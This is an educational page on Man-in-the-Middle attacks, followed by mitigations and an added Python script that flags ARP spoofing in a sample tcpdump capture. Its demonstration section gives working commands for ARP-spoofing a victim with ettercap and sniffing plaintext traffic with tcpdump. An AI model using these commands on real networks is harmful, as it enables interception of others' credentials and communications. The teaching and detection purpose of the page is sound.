Man-in-the-Middle (MITM) Attack

1. What is a MITM Attack?

A Man-in-the-Middle (MITM) attack is a type of cyberattack where an attacker intercepts and possibly alters communication between two parties without their knowledge. The attacker can:

  • Eavesdrop on sensitive data (e.g., login credentials, banking details).

  • Modify messages between parties.

  • Impersonate a legitimate user or server.

2. How MITM Attacks Work

MITM attacks typically occur in the following steps:

  1. Interception: The attacker places themselves between two communicating devices.

  2. Decryption (if applicable): If encryption is used, the attacker may attempt SSL stripping or exploit weak encryption.

  3. Data Manipulation: The attacker can modify traffic, inject malicious code, or redirect users to phishing websites.

  4. Data Exfiltration: Sensitive information is stolen and used for further exploitation.

3. MITM Attack Demonstration (Using ettercap on Kali Linux)

Step 1: Setup the Attack

Ensure you have ettercap installed on your attacker machine (Kali Linux).

```bash
sudo apt update && sudo apt install ettercap-text-only
```

Step 2: Enable IP Forwarding

Allow your machine to forward packets between devices.

```bash
echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward
```

Step 3: Identify Target IPs

Scan the network to identify potential targets. Use nmap:

```bash
sudo nmap -sn 192.168.1.0/24   # Adjust subnet as needed
```

Step 4: Launch ARP Spoofing

Run the MITM attack using ettercap.

```bash
sudo ettercap -T -M arp -i eth0 /192.168.1.100// /192.168.1.1//
```

  • 192.168.1.100: Victim's IP

  • 192.168.1.1: Router's IP

This tricks the victim into thinking the attacker's machine is the router.

Step 5: Capture Data

Use tcpdump or Wireshark to analyze the intercepted traffic:

```bash
sudo tcpdump -i eth0 port 80 -A
```

4. How to Mitigate MITM Attacks

  • Use Strong Encryption: Always use HTTPS, SSH, or a VPN to encrypt sensitive communication.

  • Enable ARP Spoofing Detection: Tools like arpwatch detect spoofing attacks.

  • Use Secure DNS: Configure DNSSEC to prevent rogue DNS attacks.

  • Employ Network Segmentation: Separate critical network resources from user devices.

  • Enforce Multi-Factor Authentication (MFA): Adds an extra layer of security even if credentials are compromised.
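The detection idea behind arpwatch, applied to what the Step 4 ARP spoofing actually puts on the wire, as an added example that is not part of the original page or of arpwatch itself. It parses a constructed capture modelled on `tcpdump -n arp` output (the IPs follow the lab addresses above; the MAC addresses are made up) and flags the two symptoms the attack produces: the gateway IP suddenly answering from a different MAC, and one MAC claiming several IPs at once. The `gateway_ip` parameter and the alert wording are this example's own choices.

```python
import re
from collections import defaultdict

# Constructed sample capture, modelled on `tcpdump -n arp` output.
# First three lines: normal replies from router (.1), victim (.100) and a
# third host (.50). Then the host at .50 starts answering for both the
# router and the victim, which is what ARP poisoning looks like on the wire.
SAMPLE_CAPTURE = """\
12:00:01.000101 ARP, Reply 192.168.1.1 is-at aa:bb:cc:00:00:01, length 28
12:00:02.000202 ARP, Reply 192.168.1.100 is-at aa:bb:cc:00:00:64, length 28
12:00:03.000303 ARP, Reply 192.168.1.50 is-at aa:bb:cc:00:00:32, length 28
12:05:10.000404 ARP, Reply 192.168.1.1 is-at aa:bb:cc:00:00:32, length 28
12:05:10.000505 ARP, Reply 192.168.1.100 is-at aa:bb:cc:00:00:32, length 28
12:05:11.000606 ARP, Reply 192.168.1.1 is-at aa:bb:cc:00:00:32, length 28
"""

ARP_REPLY = re.compile(
    r"^(?P<ts>\S+)\s+ARP,\s+Reply\s+(?P<ip>\d+\.\d+\.\d+\.\d+)\s+is-at\s+"
    r"(?P<mac>(?:[0-9a-f]{2}:){5}[0-9a-f]{2})",
    re.IGNORECASE,
)


def parse_arp_replies(capture):
    """Return (timestamp, ip, mac) for every ARP reply line; other lines are skipped."""
    events = []
    for line in capture.splitlines():
        m = ARP_REPLY.match(line.strip())
        if m:
            events.append((m["ts"], m["ip"], m["mac"].lower()))
    return events


def detect_arp_spoofing(events, gateway_ip=None):
    """Replay ARP replies in order and return a list of alert strings.

    Two symptoms are reported:
      * "changed": an IP that was bound to one MAC is now claimed by another
        (the "changed ethernet address" condition arpwatch reports); when the
        IP is the gateway it is tagged, since that is what a poisoned victim sees.
      * "multi-ip": one MAC now answers for more than one IP, which is what the
        attacker's NIC does when it poses as router and victim at once.
    """
    ip_to_mac = {}                 # last MAC seen for each IP
    mac_to_ips = defaultdict(set)  # every IP each MAC has claimed so far
    alerts = []
    for ts, ip, mac in events:
        old = ip_to_mac.get(ip)
        if old is not None and old != mac:
            tag = "GATEWAY " if ip == gateway_ip else ""
            alerts.append(f"{ts} changed: {tag}{ip} moved from {old} to {mac}")
        ip_to_mac[ip] = mac

        before = len(mac_to_ips[mac])
        mac_to_ips[mac].add(ip)
        # Alert only when the set of IPs grows, not on every repeated reply.
        if len(mac_to_ips[mac]) > 1 and len(mac_to_ips[mac]) > before:
            claimed = ", ".join(sorted(mac_to_ips[mac]))
            alerts.append(f"{ts} multi-ip: {mac} now answers for {claimed}")
    return alerts


if __name__ == "__main__":
    for alert in detect_arp_spoofing(parse_arp_replies(SAMPLE_CAPTURE),
                                     gateway_ip="192.168.1.1"):
        print(alert)
```

A "changed" alert on its own can be benign (a replaced NIC, a DHCP lease handed to another host), so the "multi-ip" alert is the stronger signal; the two together, with the gateway involved, is the pattern to page on. To run this against live traffic, feed it the output of `tcpdump -n -l arp` line by line instead of the constructed sample.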
